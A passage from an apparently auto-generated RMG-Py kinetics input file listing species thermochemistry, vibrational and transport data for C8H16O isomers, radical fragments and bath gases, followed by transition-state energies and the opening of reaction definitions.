thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.0442295,0.0867601,-7.24804e-05,3.29541e-08,-6.22122e-12,26202.3,34.317], Tmin=(100,'K'), Tmax=(1242.63,'K')), NASAPolynomial(coeffs=[14.2846,0.0406359,-1.6803e-05,3.08335e-09,-2.11624e-13,22641.2,-37.9238], Tmin=(1242.63,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(216.633,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(Cds_P) + radical(Cds_S)"""),
)
# --- Auto-generated RMG-Py species records (continued): remaining C8H16O isomers
# and the CH2(S) fragment. Numeric data is machine-generated; do not hand-edit. ---

# E0 = 167.302 kJ/mol; primary RCCJ + alkoxy radical sites; 5 hindered rotors.
species(
label = '[CH2]CC([O])C(C)C=C(20848)',
structure = SMILES('[CH2]CC([O])C(C)C=C'),
E0 = (167.302,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3010,987.5,1337.5,450,1655,2750,2800,2850,1350,1500,750,1050,1375,1000,2950,3100,1380,975,1025,1650,1380,1383.33,1386.67,1390,370,373.333,376.667,380,2800,3000,430,440,2750,2850,1437.5,1250,1305,750,350,3000,3100,440,815,1455,1000,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.165473,0.0802755,-5.20289e-05,1.39198e-08,-4.88702e-13,20281.2,35.4794], Tmin=(100,'K'), Tmax=(1179.79,'K')), NASAPolynomial(coeffs=[16.5222,0.0373397,-1.47849e-05,2.67545e-09,-1.82893e-13,15394.2,-51.8117], Tmin=(1179.79,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(167.302,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(RCCJ) + radical(CC(C)OJ)"""),
)
# Closed-shell allene product; E0 = -111.585 kJ/mol; no modes listed.
species(
label = 'C=C=C(C)C(O)CC(24957)',
structure = SMILES('C=C=C(C)C(O)CC'),
E0 = (-111.585,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.150628,0.0848636,-6.56053e-05,2.65433e-08,-4.39688e-12,-13266.1,32.1074], Tmin=(100,'K'), Tmax=(1412.47,'K')), NASAPolynomial(coeffs=[16.6026,0.0374197,-1.52212e-05,2.76264e-09,-1.87811e-13,-17998.7,-54.5026], Tmin=(1412.47,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-111.585,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsHH) + group(Cdd-CdsCds)"""),
)
# Closed-shell ketone product; E0 = -210.284 kJ/mol; no modes listed.
species(
label = 'C=CC(C)C(=O)CC(20852)',
structure = SMILES('C=CC(C)C(=O)CC'),
E0 = (-210.284,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.566841,0.081795,-7.1471e-05,4.03868e-08,-1.05585e-11,-25173.2,28.8177], Tmin=(100,'K'), Tmax=(870.489,'K')), NASAPolynomial(coeffs=[6.43572,0.054827,-2.5001e-05,4.79787e-09,-3.37625e-13,-26194.9,1.31771], Tmin=(870.489,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-210.284,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-O2d)CsCsH) + group(Cs-(Cds-O2d)CsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-OdCsCs) + group(Cds-CdsCsH) + group(Cds-CdsHH)"""),
)
# Singlet methylene fragment; E0 = 419.862 kJ/mol; thermo from Klippenstein_Glarborg2016 library.
species(
label = 'CH2(S)(23)',
structure = SMILES('[CH2]'),
E0 = (419.862,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1369.36,2789.41,2993.36],'cm^-1')),
],
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (14.0266,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.19195,-0.00230793,8.0509e-06,-6.60123e-09,1.95638e-12,50484.3,-0.754589], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.28556,0.00460255,-1.97412e-06,4.09548e-10,-3.34695e-14,50922.4,8.67684], Tmin=(1000,'K'), Tmax=(3000,'K'))], Tmin=(200,'K'), Tmax=(3000,'K'), E0=(419.862,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(58.2013,'J/(mol*K)'), label="""CH2(S)""", comment="""Thermo library: Klippenstein_Glarborg2016"""),
)
# --- Auto-generated RMG-Py species records (continued): smaller C7 fragments and
# additional C8 isomers/products. Numeric data is machine-generated; do not hand-edit. ---

# C7H13O di-radical fragment; E0 = 231.65 kJ/mol; fitted (non-placeholder) rotor parameters.
species(
label = 'C=[C]CC([O])CC(24958)',
structure = SMILES('C=[C]CC([O])CC'),
E0 = (231.65,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2783.33,2816.67,2850,1425,1450,1225,1275,1270,1340,700,800,300,400,2950,3100,1380,975,1025,1650,1685,370,1380,1390,370,380,2900,435,2750,2800,2850,1350,1500,750,1050,1375,1000,265.814,265.815,265.815,4000],'cm^-1')),
HinderedRotor(inertia=(0.190146,'amu*angstrom^2'), symmetry=1, barrier=(9.53396,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.378745,'amu*angstrom^2'), symmetry=1, barrier=(18.9903,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.378745,'amu*angstrom^2'), symmetry=1, barrier=(18.9903,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0190333,'amu*angstrom^2'), symmetry=1, barrier=(18.9903,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (98.143,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.778392,0.0678099,-4.94063e-05,1.89879e-08,-3.03905e-12,27979.2,28.7695], Tmin=(100,'K'), Tmax=(1431.91,'K')), NASAPolynomial(coeffs=[12.8122,0.0341938,-1.41917e-05,2.59277e-09,-1.76603e-13,24532.9,-33.6072], Tmin=(1431.91,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(231.65,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(390.78,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(Cds_S) + radical(CC(C)OJ)"""),
)
# C7H13O di-radical fragment; E0 = 223.678 kJ/mol; includes Joback transport estimate.
species(
label = 'C=[C]C(C)C(C)[O](19568)',
structure = SMILES('C=[C]C(C)C(C)[O]'),
E0 = (223.678,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2950,3100,1380,975,1025,1650,1685,370,1380,1383.33,1386.67,1390,370,373.333,376.667,380,2800,3000,430,440,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,180,528.76,546.798],'cm^-1')),
HinderedRotor(inertia=(0.104883,'amu*angstrom^2'), symmetry=1, barrier=(2.41146,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.227495,'amu*angstrom^2'), symmetry=1, barrier=(12.5088,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0637133,'amu*angstrom^2'), symmetry=1, barrier=(12.4928,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0599492,'amu*angstrom^2'), symmetry=1, barrier=(12.5012,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (98.143,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(3818.2,'J/mol'), sigma=(6.62498,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=596.39 K, Pc=29.8 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.463893,0.0686477,-4.96367e-05,1.85833e-08,-2.8272e-12,27037.1,29.6678], Tmin=(100,'K'), Tmax=(1539.81,'K')), NASAPolynomial(coeffs=[15.6202,0.0292757,-1.12826e-05,1.97779e-09,-1.31166e-13,22369.5,-49.995], Tmin=(1539.81,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(223.678,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(390.78,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsOsH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(Cds_S) + radical(CC(C)OJ)"""),
)
# Allylic/alkoxy di-radical; label and SMILES are resonance forms; E0 = 93.6706 kJ/mol.
species(
label = 'C=C([CH]C)C([O])CC(24176)',
structure = SMILES('[CH2]C(=CC)C([O])CC'),
E0 = (93.6706,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.230531,0.0810783,-5.01538e-05,1.00705e-08,1.1291e-12,11428.3,33.4333], Tmin=(100,'K'), Tmax=(1136.76,'K')), NASAPolynomial(coeffs=[17.1455,0.0371582,-1.49247e-05,2.73759e-09,-1.89289e-13,6365.1,-57.5174], Tmin=(1136.76,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(93.6706,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsCsH) + radical(Allyl_P) + radical(CC(C)OJ)"""),
)
# Allylic C=CCJCO + alkoxy di-radical; E0 = 71.6698 kJ/mol; no modes listed.
species(
label = 'C=C(C)[CH]C([O])CC(24959)',
structure = SMILES('C=C(C)[CH]C([O])CC'),
E0 = (71.6698,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.417587,0.0890152,-6.88228e-05,2.75068e-08,-4.47416e-12,8785.44,30.5522], Tmin=(100,'K'), Tmax=(1442.82,'K')), NASAPolynomial(coeffs=[18.1573,0.0375191,-1.52857e-05,2.76956e-09,-1.87891e-13,3425.4,-65.8705], Tmin=(1442.82,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(71.6698,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsHH) + radical(C=CCJCO) + radical(CC(C)OJ)"""),
)
# Cyclic (2-methyleneoxetane ring) closed-shell product; E0 = -147.193 kJ/mol.
species(
label = 'C=C1OC(CC)C1C(24923)',
structure = SMILES('C=C1OC(CC)C1C'),
E0 = (-147.193,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.350735,0.0551854,4.85809e-05,-1.13819e-07,5.15709e-11,-17548.6,23.4642], Tmin=(100,'K'), Tmax=(922.673,'K')), NASAPolynomial(coeffs=[22.6806,0.0231271,-4.56127e-06,6.32584e-10,-4.69066e-14,-24425.3,-97.4024], Tmin=(922.673,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-147.193,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(469.768,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-Cs(Cds-Cd)) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsOs) + group(Cds-CdsHH) + ring(2methyleneoxetane)"""),
)
# --- Auto-generated RMG-Py species records (continued): small fragments and
# bath gases. Library species (CH2(S), H2CC, O, N2, Ne) carry thermo from named
# libraries; the rest are group-additivity estimates. Do not hand-edit values. ---

# Vinylidene; E0 = 401.202 kJ/mol; thermo from Klippenstein_Glarborg2016 library.
species(
label = 'H2CC(41)',
structure = SMILES('[C]=C'),
E0 = (401.202,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2950,3100,1380,975,1025,1650],'cm^-1')),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (26.0373,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(2480.69,'J/mol'), sigma=(4.48499,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=387.48 K, Pc=62.39 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.28155,0.00697643,-2.38528e-06,-1.21078e-09,9.82042e-13,48319.2,5.92036], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[4.27807,0.00475623,-1.63007e-06,2.54623e-10,-1.4886e-14,48014,0.639979], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(401.202,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(83.1447,'J/(mol*K)'), label="""H2CC""", comment="""Thermo library: Klippenstein_Glarborg2016"""),
)
# C5H11O di-radical fragment; E0 = 89.7082 kJ/mol; fitted rotor parameters.
species(
label = 'C[CH]C([O])CC(10592)',
structure = SMILES('C[CH]C([O])CC'),
E0 = (89.7082,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,3025,407.5,1350,352.5,1380,1390,370,380,2900,435,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,435.236,435.26,435.38],'cm^-1')),
HinderedRotor(inertia=(0.000889277,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.000890405,'amu*angstrom^2'), symmetry=1, barrier=(0.119627,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0567145,'amu*angstrom^2'), symmetry=1, barrier=(7.62767,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0567145,'amu*angstrom^2'), symmetry=1, barrier=(7.62809,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (86.1323,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.17399,0.0529682,-1.85308e-05,-9.37379e-09,6.22763e-12,10899,26.6569], Tmin=(100,'K'), Tmax=(1066.07,'K')), NASAPolynomial(coeffs=[11.8674,0.0306075,-1.206e-05,2.20812e-09,-1.53359e-13,7609.65,-30.3505], Tmin=(1066.07,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(89.7082,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(365.837,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(CCJCO) + radical(CC(C)OJ)"""),
)
# Atomic oxygen; E0 = 243.005 kJ/mol; thermo from BurkeH2O2 library, transport from GRI-Mech.
species(
label = 'O(4)',
structure = SMILES('[O]'),
E0 = (243.005,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (15.9994,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(665.16,'J/mol'), sigma=(2.75,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,9.24385e-15,-1.3678e-17,6.66185e-21,-1.00107e-24,29226.7,5.11107], Tmin=(100,'K'), Tmax=(3459.6,'K')), NASAPolynomial(coeffs=[2.5,9.20456e-12,-3.58608e-15,6.15199e-19,-3.92042e-23,29226.7,5.11107], Tmin=(3459.6,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(243.005,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""O""", comment="""Thermo library: BurkeH2O2"""),
)
# C7H13 di-radical (no oxygen); E0 = 336.549 kJ/mol; placeholder rotor parameters.
species(
label = 'C=[C]C(C)[CH]CC(24265)',
structure = SMILES('C=[C]C(C)[CH]CC'),
E0 = (336.549,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1685,370,3025,407.5,1350,352.5,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,2950,3100,1380,975,1025,1650,1380,1390,370,380,2900,435,2750,2850,1437.5,1250,1305,750,350,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (96.1702,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.751194,0.0665364,-3.88394e-05,1.11087e-08,-1.29102e-12,40598.1,31.271], Tmin=(100,'K'), Tmax=(1913.45,'K')), NASAPolynomial(coeffs=[15.9081,0.0348515,-1.40008e-05,2.45473e-09,-1.60346e-13,34797.7,-51.6879], Tmin=(1913.45,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(336.549,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(436.51,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(Cs_S) + radical(Cds_S)"""),
)
# Bath gas: molecular nitrogen; thermo from BurkeH2O2 library.
species(
label = 'N2',
structure = SMILES('N#N'),
E0 = (-8.69489,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (28.0135,'amu'),
collisionModel = TransportData(shapeIndex=1, epsilon=(810.913,'J/mol'), sigma=(3.621,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(1.76,'angstroms^3'), rotrelaxcollnum=4.0, comment="""PrimaryTransportLibrary"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.61263,-0.00100893,2.49898e-06,-1.43376e-09,2.58636e-13,-1051.1,2.6527], Tmin=(100,'K'), Tmax=(1817.04,'K')), NASAPolynomial(coeffs=[2.9759,0.00164141,-7.19722e-07,1.25378e-10,-7.91526e-15,-1025.84,5.53757], Tmin=(1817.04,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-8.69489,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(37.4151,'J/(mol*K)'), label="""N2""", comment="""Thermo library: BurkeH2O2"""),
)
# Bath gas: neon; NOTE(review): sigma is given in metres here (3.758e-10,'m'),
# unlike the angstrom units used elsewhere — fallback Lennard-Jones estimate.
species(
label = 'Ne',
structure = SMILES('[Ne]'),
E0 = (-6.19738,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (20.1797,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1235.53,'J/mol'), sigma=(3.758e-10,'m'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with fixed Lennard Jones Parameters. This is the fallback method! Try improving transport databases!"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""Ne""", comment="""Thermo library: primaryThermoLibrary"""),
)
transitionState(
label = 'TS1',
E0 = (199.898,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS2',
E0 = (342.409,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS3',
E0 = (310.791,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS4',
E0 = (351.948,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS5',
E0 = (298.871,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS6',
E0 = (326.151,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS7',
E0 = (212.813,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS8',
E0 = (243.752,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS9',
E0 = (382.479,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS10',
E0 = (365.568,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS11',
E0 = (314.589,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS12',
E0 = (341.875,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS13',
E0 = (351.777,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS14',
E0 = (275.178,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS15',
E0 = (275.001,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS16',
E0 = (258.299,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS17',
E0 = (244.206,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS18',
E0 = (258.463,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS19',
E0 = (249.673,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS20',
E0 = (235.7,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS21',
E0 = (494.183,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS22',
E0 = (278.145,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS23',
E0 = (288.866,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS24',
E0 = (651.512,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS25',
E0 = (643.54,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS26',
E0 = (294.372,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS27',
E0 = (344.518,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS28',
E0 = (208.182,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS29',
E0 = (490.91,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS30',
E0 = (579.554,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
reaction(
label = 'reaction1',
reactants = ['C=[C]C(C)C([O])CC(20840)'],
products = ['C2H5CHO(70)', 'CH3CHCCH2(18175)'],
transitionState = 'TS1',
kinetics = Arrhenius(A=(5e+12,'s^-1'), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""Exact match found for rate rule [RJJ]
Euclidian distance = 0
family: 1,4_Linear_birad_scission"""),
)
reaction(
label = 'reaction2',
reactants = ['H(3)', 'C=C=C(C)C([O])CC(24948)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS2',
